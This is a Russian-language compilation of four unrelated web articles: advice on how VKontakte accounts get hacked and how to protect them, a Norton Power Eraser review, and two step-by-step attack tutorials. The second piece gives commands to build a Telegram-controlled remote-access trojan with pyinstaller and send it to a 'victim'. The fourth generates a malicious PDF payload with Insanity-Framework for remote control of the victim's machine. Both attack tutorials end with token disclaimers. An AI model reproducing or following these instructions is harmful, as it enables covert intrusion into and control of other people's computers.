ВКонтакте — одна из самых продвинутых соцсетей в плане защищённости, но её пользователей всё равно очень часто в взламывают. Как хакерам это удаётся, если страница защищена паролем и привязана к номеру телефона? Пароль Пароль — самое слабое место любой учётной записи. Если злоумышленник знает ваш логин, email-адрес или номер телефона, ему остаётся только подобрать пароль. Сделать это можно разными способами: перебрать брутфорсом популярные пароли, подсмотреть, перехватить через открытую точку Wi-Fi. Если вы используете один и тот же пароль на всех сайтах, вы сильно упрощаете задачу злодею: если он взломает вашу почту и увидит в открытом виде пароль, который вы используете на других сайтах, он догадается, что он подходит к вашей странице в соцсети. Некоторые хакеры сначала ломают именно почту, а потом всё остальное. Пароли также перехватываются с помощью кейлогеров на компьютерах в общественных местах. Если вы заходите в аккаунт с чужого компьютера, подумайте, доверяете ли вы его владельцу и нет ли вероятности, что на ПК установлена программа, перехватывающая все вводимые символы. Вирусы и расширения Уводить логины и пароли могут вирусы и расширения для браузеров, запрашивающие доступ к «ВКонтакте». Кроме того, сбором этих данных могут заниматься приложения, «паразитирующи» на «ВКонтакте» (например, аудиоплееры), а также программы, расширяющие возможности соцсети или сайты, позволяющие зарабатывать на лайках, репостах, комментариях и добавлениях в друзья. Если вы пользуетесь чем-то подобным, почаще меняйте пароль — возможно, он давно уже слит и продан потенциальным мошенникам. Взлом смартфона Пароль можно сбросить по SMS, поэтому не оставляйте свой смартфон без присмотра и блокируйте устройство так, чтобы никто не смог прочитать на нём входящие сообщения. Если вы отдыхаете с компанией и уснули, а ваш смартфон защищён только сканером отпечатков пальцев, заблокируйте его так, чтобы для входа дополнительно потребовался пароль. Так его не смогут взломать, даже если подставят к сканеру ваш палец, пока вы спите. Перехват SMS У SMS есть уязвимость, которую никто не может устранить. Эта уязвимость позволяет настроить перехват SMS-сообщений и взломать аккаунт «восстановлением» пароля. В интернете полно объявлений о взломе страниц «ВКонтакте» и других аккаунтов, привязанных к номеру телефона, — хакеры пользуются именно этой уязвимостью. Как защититься от взлома? Прежде всего придумайте сложный пароль, используйте его только для этой соцсети и регулярно меняйте его на новый. Зайдите в настройки безопасности «ВКонтакте» и как минимум установите оповещения о входе в аккаунт. Также можно настроить двухфакторную аутентификацию, при которой каждый вход будет подтверждаться кодом, пришедшим по SMS. Но помните, что защитить свой аккаунт от взлома на 100% у вас всё равно не получится, поэтому не держите в нём ничего, что могло бы вас скомпрометировать.
-
Приветствую хакеры, в данной статье мы разберемся, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux. Для начала обновляем пакеты: apt update && apt upgrade Устанавливаем все необходимые библиотеки для установки: apt install python3 python3-pip pip3 install pyinstaller pip3 install pytelegrambotapi opencv-python cryptography pip3 install comtypes pywin32 pyaudio pillow pycaw Клонируем инструмент с репозитория GitHub: git clone https://github.com/Bainky/Telegram-RAT Далее переходим в директорию инструмента: cd Telegram-RAT Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота. Осталось только скомпилировать данный файл и все готово: pyinstaller --onefile --noconsole RAT.py После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве. В том случае, если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram и сможем управлять им. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци.
-
Norton Power Eraser – это полноценный и эффективный инструмент поиска вирусов — при проверке он обнаружил и безопасным способом удалил несколько потенциально нежелательных и вредоносных программ с моего компьютера. Программа имеет минимальный функционал, поэтому она очень проста в использовании. После загрузки вам будет предложено выполнить полноценное сканирование на руткиты или один из четырех продвинутых вариантов сканирования: Поиск нежелательных приложений. Сканирует все файлы программ на наличие потенциально нежелательных программ и предлагает удалить их из системы.Поиск известных угроз. Сканирует выбранную папку на наличие известных вредоносных программ, используя базу данных вредоносных программ Norton.Сканирование системы. Сканирует операционную систему на наличие уязвимостей.Сканирование нескольких ОС. Продвинутая версия сканирования системы, которая позволяет выполнять сканирование компьютеров с несколькими операционными системами.Поиск руткитов занял около 90 минут и обнаружил 100% вредоносных программ, которые я сохранил на компьютере. Поиск известных угроз за несколько секунд смог обнаружить и удалить вредоносные программы из выбранных мной папок.
-
Первоначально формат PDF был разработан компанией Adobe для федеральных властей США. Сейчас же PDF-файлы широко используются в управлении производством, сфере различных финансовых услуг, образовательных учреждениях и т.д Именно поэтому в данной статье мы разберемся, как получить удаленный доступ к целевому компьютеру с помощью вредоносного PDF. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: apt-get update && apt-get upgrade Устанавливаем git: apt-get install git Далее клонируем репозиторий с помощью команды: git clone https://github.com/4w4k3/Insanity-Framework Переходим в директорию: cd Insanity-Framework Делаем скрипт установки исполняемым и запускаем: chmod +x install.sh ./install.sh После выполнения вышеперечисленных команд будет запущен процесс установки инструмента и всех необходимым компонентов для правильной работоспособности. Как только установка будет завершена, появится окно программы, где будет предложено нажать клавину «Enter» для продолжения. Нажимаем данную клавишу и попадаем в главное меню утилиты, в котором выбираем цифру 1 для создания полезной нагрузки, а после выбираем цифру 5 для генерации вредоносного PDF. Далее инструмент покажет полный путь, куда был сохранен PDF-файл, и предложит запустить слушателя. Теперь осталось отправить вредоносный PDF-файл нашей жертве. После того, как жертва запустит этот файл, мы получим сессию для удаленного управления взломанным компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.